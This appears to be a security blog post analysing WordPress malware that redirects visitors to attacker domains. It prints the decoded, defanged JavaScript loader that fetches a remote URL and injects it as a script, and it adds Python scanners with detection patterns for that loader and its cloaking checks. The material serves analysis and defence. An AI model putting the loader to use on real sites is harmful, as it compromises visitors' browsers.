WordPress Malware Redirects Users To Harmful Sites

Musaib Asharaf

May 15, 2025 · 7 min read

WordPress Malware: Malicious software designed to harm, exploit, or illegally access computers, networks, or data.

WordPress Splogs Redirect Traffic to Worthless Sites

Not long ago, one of our customers came to us after realising that their website was redirecting traffic to suspicious URLs.

They thought their website had been hacked and needed help finding and fixing the problem.

This prompted me to look much deeper into the infection and its propagation patterns.

What did we notice?

Their website traffic was being redirected to hxxps://cdn1[.]massearchtraffic[.]top/sockets.

To my surprise, we found that the domain massearchtraffic[.]top is flagged as malicious and hosts malicious code that redirects pages to hxxps://cdn1[.]massearchtraffic[.]top/sockets.

While I was writing this article, other websites were also being infected by attackers using the same WordPress malware.

The injected iframe tags were placed at the start of unrelated posts within the infected WordPress blog.

The malware was discovered with SiteCheck, which classifies it under Known JavaScript Malware: redirect?fake_click.1.

Understanding the Code for WordPress Malware

The first check ensures that the attacker’s code runs only once during a given session.

This check helps the script avoid detection by anti-malware systems.

It is performed by testing whether a particular cookie is present.

Additionally, the script does not execute for logged-in WordPress users, which reduces the chance that site admins notice it.

The malware also filters requests by user agent; search engine bots, for example, are excluded.

Requests whose URLs contain certain substrings, such as "/wp-login.php" and "/wp-json", are also denied.
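A cloaking-aware check, added here as an example and not part of the original article: because the script skips logged-in users, search-engine bots and repeat visits, a scan from an admin browser or with a crawler user agent will not see it, so compare what an anonymous first-time visitor receives with what a bot receives and report the script and iframe sources served only to the visitor. The user-agent strings, the hypothetical check_site() helper and the two sample responses are constructed for illustration; the iframe domain in the sample is the one the article reports, kept defanged.

```python
import re
import urllib.request

# Typical desktop browser UA vs a crawler UA (both constructed for this example).
VISITOR_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
BOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Matches <script src=...> and <iframe src=...>, the two tag types the article says were injected.
SRC_RE = re.compile(r"<(script|iframe)\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def external_sources(html: str) -> set:
    """Every script/iframe src present in a page."""
    return {m.group(2) for m in SRC_RE.finditer(html)}


def cloaked_sources(visitor_html: str, bot_html: str) -> set:
    """Sources served to an ordinary first-time visitor but withheld from a bot."""
    return external_sources(visitor_html) - external_sources(bot_html)


def fetch_view(url: str, user_agent: str) -> str:
    """One fresh request: no cookie jar, so the malware's run-once cookie is never sent."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_site(url: str) -> set:
    """Hypothetical helper: fetch both views of a live page and diff them."""
    return cloaked_sources(fetch_view(url, VISITOR_UA), fetch_view(url, BOT_UA))


# Constructed sample responses for offline use; the iframe domain is the article's, defanged.
BOT_VIEW = ("<html><head><script src='/wp-includes/js/jquery.js'></script></head>"
            "<body><p>post</p></body></html>")
VISITOR_VIEW = ("<html><head><script src='/wp-includes/js/jquery.js'></script></head>"
                "<body><iframe src='hxxps://cdn1[.]massearchtraffic[.]top/sockets'></iframe>"
                "<p>post</p></body></html>")

if __name__ == "__main__":
    for src in sorted(cloaked_sources(VISITOR_VIEW, BOT_VIEW)):
        print("served only to visitors:", src)
```

Run the differential check from a machine that has never visited the site, since the run-once cookie would otherwise hide the injection on the second request.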

Visitors who pass these checks may be sent to the hxxps://streamain[.]top/api[.]php domain, where their devices could be compromised.

This is dangerous, because the visitors are redirected to a malicious domain.

Moreover, additional malicious payloads are fetched and executed as scripts injected into the visitor’s browser.

This is a grave concern for users, as it compromises their devices.

The obfuscated strings decode to the URL "hxxps://streamain[.]top/api[.]php" and to the following loader, which fetches a URL from a text file hosted on GitHub and injects it as a script into the page head:

    const url = 'hxxps://raw[.]githubusercontent[.]com/AlexanderRPatton/cdn/main/repo.txt';
    fetch(url).then(response => response.text())
      .then(data => {
        // the fetched text is itself a URL; it becomes the src of a new <script> tag
        const script = document.createElement('script');
        script.src = data.trim();
        document.getElementsByTagName('head')[0].appendChild(script);
      });
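A static scanner for the indicators and behaviours described above, added here as an example (not the article’s or SiteCheck’s code): it looks for the article’s defanged domains and for the generic remote-loader and cloaking patterns, so it also catches variants that merely swap the domain. The indicator list comes from this article, the sample snippets are constructed, and the pattern names are my own.

```python
import re

# Indicators named in the article, kept defanged in source and refanged at runtime.
DEFANGED_IOCS = ["cdn1[.]massearchtraffic[.]top", "streamain[.]top/api[.]php",
                 "raw[.]githubusercontent[.]com/AlexanderRPatton/cdn"]

def refang(s: str) -> str:
    """Turn the defanged notation used in reports back into matchable text."""
    return s.replace("[.]", ".").replace("hxxp", "http")

IOCS = [refang(i) for i in DEFANGED_IOCS]

# Behavioural patterns from the article, independent of any particular domain.
PATTERNS = {
    # fetch a text resource, then inject its content as the src of a new <script>
    "remote-script-loader": re.compile(
        r"fetch\s*\(.*?\)\s*\.then\s*\(.*?\.text\(\)\s*\).*?"
        r"createElement\s*\(\s*['\"]script['\"]\s*\).*?\.src\s*=.*?appendChild", re.S | re.I),
    "cookie-run-once": re.compile(r"document\.cookie", re.I),
    "bot-ua-filter": re.compile(r"navigator\.userAgent.*?(googlebot|bingbot|crawl|spider)", re.S | re.I),
    "wp-path-filter": re.compile(r"/wp-login\.php|/wp-json", re.I),
}

def scan_source(text: str) -> dict:
    """Report known indicators and loader/cloaking behaviours found in one file's text."""
    low = text.lower()
    return {"iocs": [i for i in IOCS if i.lower() in low],
            "behaviours": [name for name, pat in PATTERNS.items() if pat.search(text)]}

def is_suspicious(findings: dict) -> bool:
    # A known indicator or a remote loader is enough on its own; the cloaking checks
    # alone are weaker evidence, since legitimate plugins also read cookies and UAs.
    return bool(findings["iocs"]) or "remote-script-loader" in findings["behaviours"]

# Constructed sample modelled on the loader decoded above (refanged so the scanner sees real text).
SAMPLE_INJECTED = refang("""
if (!document.cookie.includes('_seen') && !navigator.userAgent.match(/googlebot|bingbot/i)
    && !location.href.includes('/wp-login.php') && !location.href.includes('/wp-json')) {
  const url = 'hxxps://raw[.]githubusercontent[.]com/AlexanderRPatton/cdn/main/repo.txt';
  fetch(url).then(response => response.text()).then(data => {
    const script = document.createElement('script');
    script.src = data.trim();
    document.getElementsByTagName('head')[0].appendChild(script);
  });
}
""")
# Constructed benign snippet: an ordinary theme script include.
SAMPLE_BENIGN = "<script src='/wp-content/themes/demo/js/main.js'></script>"
```

Point scan_source() at the contents of theme and plugin files, wp-includes, and post content pulled from the database, since the article found the injection inside blog posts rather than only in files.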

A Wide Range of Undetectable Hacking Tools

What concerns users most is being redirected to an attacker-controlled URL; the likelihood is that the attackers aim to deceive visitors.

Behind the scenes, the script could also be planting backdoors for the attackers, keeping their access path permanently hidden.

What may have infected the site, and what were the attackers hoping to achieve?

The infection could have resulted from one or more of the causes discussed below.

The use of outdated or nulled themes and plugins: Attackers can take advantage of plugins or themes that have not been updated in a long time and carry known flaws.

Custom code with weak logic: Attackers have an easy time infecting a site when enough custom PHP scripts with weak logic are there to welcome them.

Attacks using existing backdoors: If backdoors were already present on the site, attackers could easily add more malicious scripts, inject other scripts, or, after a partial cleanup, re-add their scripts and reinfect the system.

Attacks from previously compromised accounts: A compromised admin account can also expose the hosting control panel logins; with those credentials, attackers can do anything WordPress itself can do and drop every form of malware onto the server.

Such infections are not unique; attackers’ motives commonly include:

Spam injection that damages the site’s online presence: Injected spam raises red flags and undermines the credibility of the affected domain.

Search reputation sabotage: Search engines such as Google and Bing penalise the infected site, so it loses visibility while legitimate users lose trust in it.

Exploiting the infected site’s traffic: Attackers divert the site’s visitors so that traffic to their malicious destinations rises.

Malicious content injection: Spam and other unwanted code designed to disrupt the normal behaviour of the infected site.

Conclusion: Defending Your WordPress Site from Malware Redirects

This WordPress malware campaign demonstrates how easily attackers capitalise on gaps in WordPress websites, installing and executing a myriad of invasive code, controlling the site’s traffic and user flow, and more.

The consequences reach far beyond a security breach: the infection also damages your reputation on search engines and your brand image, and erodes the confidence your users have in you. This is precisely why, today, a comprehensive multi-layered security strategy should not be treated as optional.

Periodic maintenance, strict user role policies, active scanning for command and control (C2) server traffic, and edge firewalls can reduce your site’s exposure to these attacks.

Prevention is the best strategy; working actively to prevent an infection is always better and cheaper than recovering from one.

Do not wait if your site has already been compromised; malware can evolve and self-replicate rapidly. Have a proper cleanup and security service such as Sucuri or Wordfence perform a complete examination, remove any infections, and fortify the site against advanced persistent threats so it can withstand future attacks.

Users of Elyspace.com are strongly encouraged to shift their perception of online security: make it a primary part of your digital strategy instead of merely reacting after something goes wrong.

Remediation Steps to Remove WordPress Malware

Update WordPress core, plugins, and themes: Install updates regularly to close known vulnerabilities.

Audit custom code: Apply secure coding standards to every custom PHP script.

Scan for backdoors: Use malware scanners such as Sucuri to detect concealed backdoors.

Strengthen account security: Enforce strong passwords and two-factor authentication for every account.

Use a website firewall: A web application firewall (WAF) can filter out malicious requests before they reach your site.

Clean up unused plugins and themes: Remove any unnecessary or inactive plugins and themes to reduce the attack surface of your website.

Limit login attempts: Cap the number of login attempts to reduce the likelihood of brute-force attacks on administrator accounts.

Track file changes: Use Wordfence or iThemes Security to monitor changes to key files and folders of your WordPress installation.

Prevent PHP from running in untrusted folders: Disable PHP execution in folders such as /wp-content/uploads/ so that uploaded malware cannot run.

Back up the site regularly: Keep backups on a regular schedule so that any data lost to viruses or errors can be restored quickly.

Implement least-privilege access: Restrict each user to the minimal role they need, and do not grant full administrator access freely.

Review site activity logs: Regularly check file changes and login activity to help detect suspicious actions.